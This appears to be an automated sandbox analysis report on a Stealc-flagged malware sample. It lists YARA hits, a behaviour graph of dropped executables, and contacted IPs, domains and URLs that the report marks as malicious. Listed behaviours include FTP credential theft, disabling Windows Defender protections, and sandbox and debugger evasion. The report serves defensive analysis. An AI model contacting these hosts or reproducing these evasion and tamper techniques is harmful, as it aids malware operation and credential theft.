Source: Yara match File source: Process Memory Space: ee8d47a049.exe PID: 7836, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 32.2.num.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.num.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.num.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.36c3130eac.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.num.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.36c3130eac.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.PJGT15Z82T6C2GQS.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.ZR7XTEYLCJ0IZBOL3C6E.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.3104993509.0000000000DD1000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2518168701.000000000109E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2956398464.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.3076762189.0000000000DD1000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.3105966323.0000000004F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.3280676908.0000000000DD1000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3241643306.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2998225047.0000000000F11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.3250481515.0000000000DD1000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3242620243.0000000000F11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2516681456.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.3303275085.00000000001D1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2428440432.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3109724508.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.3148683009.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2997022588.000000000074C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.3284197061.0000000001107000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.3305271933.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PJGT15Z82T6C2GQS.exe PID: 2988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 36c3130eac.exe PID: 8068, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540852 Sample: file.exe Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 92 studennotediw.store 2->92 94 steamcommunity.com 2->94 96 14 other IPs or domains 2->96 114 Suricata IDS alerts for network traffic 2->114 116 Found malware configuration 2->116 118 Antivirus detection for URL or domain 2->118 120 17 other signatures 2->120 9 skotes.exe 4 25 2->9         started        14 file.exe 3 2->14         started        16 skotes.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 106 185.215.113.43, 49995, 49996, 49999 WHOLESALECONNECTIONSNL Portugal 9->106 78 C:\Users\user\AppData\Local\Temp\...\num.exe, PE32 9->78 dropped 80 C:\Users\user\AppData\...\55662d7496.exe, PE32 9->80 dropped 82 C:\Users\user\AppData\...\36c3130eac.exe, PE32 9->82 dropped 90 5 other malicious files 9->90 dropped 166 Creates multiple autostart registry keys 9->166 168 Hides threads from debuggers 9->168 170 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->170 20 ee8d47a049.exe 9->20         started        25 36c3130eac.exe 9->25         started        27 55662d7496.exe 9->27         started        29 num.exe 9->29         started        108 sergei-esenin.com 104.21.53.8, 443, 49713, 49714 CLOUDFLARENETUS United States 14->108 110 steamcommunity.com 104.102.49.254, 443, 49712, 49998 AKAMAI-ASUS United States 14->110 112 185.215.113.16, 49772, 49997, 50001 WHOLESALECONNECTIONSNL Portugal 14->112 84 C:\Users\user\...\PJGT15Z82T6C2GQS.exe, PE32 14->84 dropped 86 C:\Users\user\...\A94C1J5VAPFWM1J1FS.exe, PE32 14->86 dropped 88 C:\Users\...\6BWDEAM9H4119O8P9KYSM4M710Q.exe, PE32 14->88 dropped 172 Query firmware table information (likely to detect VMs) 14->172 174 Tries to harvest and steal ftp login credentials 14->174 176 Tries to evade debugger and weak emulator (self modifying code) 14->176 180 3 other signatures 14->180 31 A94C1J5VAPFWM1J1FS.exe 4 14->31         started        33 6BWDEAM9H4119O8P9KYSM4M710Q.exe 9 1 14->33         started        35 PJGT15Z82T6C2GQS.exe 13 14->35         started        178 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->178 37 firefox.exe 18->37         started        39 6 other processes 18->39 file6 signatures7 process8 dnsIp9 70 C:\Users\user\...\ZR7XTEYLCJ0IZBOL3C6E.exe, PE32 20->70 dropped 72 C:\Users\...\Z72A5QS1XOE2OWTBBJM669OT.exe, PE32 20->72 dropped 74 C:\Users\...\LIZ1X768O6R3WBN7EPZHLFTDS.exe, PE32 20->74 dropped 122 Antivirus detection for dropped file 20->122 124 Multi AV Scanner detection for dropped file 20->124 126 Detected unpacking (changes PE section rights) 20->126 144 4 other signatures 20->144 41 ZR7XTEYLCJ0IZBOL3C6E.exe 20->41         started        44 LIZ1X768O6R3WBN7EPZHLFTDS.exe 20->44         started        46 Z72A5QS1XOE2OWTBBJM669OT.exe 20->46         started        128 Binary is likely a compiled AutoIt script file 27->128 48 taskkill.exe 27->48         started        50 taskkill.exe 27->50         started        54 4 other processes 27->54 76 C:\Users\user\AppData\Local\...\skotes.exe, PE32 31->76 dropped 130 Machine Learning detection for dropped file 31->130 132 Tries to evade debugger and weak emulator (self modifying code) 31->132 134 Tries to detect virtualization through RDTSC time measurements 31->134 52 skotes.exe 31->52         started        136 Modifies windows update settings 33->136 138 Disables Windows Defender Tamper protection 33->138 140 Disable Windows Defender notifications (registry) 33->140 142 Disable Windows Defender real time protection (registry) 33->142 98 185.215.113.37, 49859, 80 WHOLESALECONNECTIONSNL Portugal 35->98 146 3 other signatures 35->146 100 youtube.com 142.250.185.142 GOOGLEUS United States 37->100 102 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 37->102 104 2 other IPs or domains 37->104 56 2 other processes 37->56 58 5 other processes 39->58 file10 signatures11 process12 signatures13 148 Antivirus detection for dropped file 41->148 150 Multi AV Scanner detection for dropped file 41->150 152 Detected unpacking (changes PE section rights) 41->152 154 Tries to detect sandboxes / dynamic malware analysis system (registry check) 44->154 156 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 44->156 158 Tries to detect sandboxes and other dynamic analysis tools (window names) 46->158 60 conhost.exe 48->60         started        62 conhost.exe 50->62         started        160 Machine Learning detection for dropped file 52->160 162 Tries to evade debugger and weak emulator (self modifying code) 52->162 164 Hides threads from debuggers 52->164 64 conhost.exe 54->64         started        66 conhost.exe 54->66         started        68 conhost.exe 54->68         started        process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.53.8
 sergei-esenin.com United States
13335 CLOUDFLARENETUS true
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.185.142
 youtube.com United States
15169 GOOGLEUS false
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
steamcommunity.com 104.102.49.254 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
ipv4only.arpa 192.0.0.170 true
sergei-esenin.com 104.21.53.8 true
youtube.com 142.250.185.142 true
bathdoomgaz.store unknown unknown
spirittunek.store unknown unknown
licendfilteo.site unknown unknown
detectportal.firefox.com unknown unknown
studennotediw.store unknown unknown
mobbipenju.store unknown unknown
eaglepawnoy.store unknown unknown
clearancek.site unknown unknown
dissapoiznw.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
dissapoiznw.store true
    		unknown
    https://steamcommunity.com/profiles/76561199724331900 true
      		unknown
      https://sergei-esenin.com/api true
        		unknown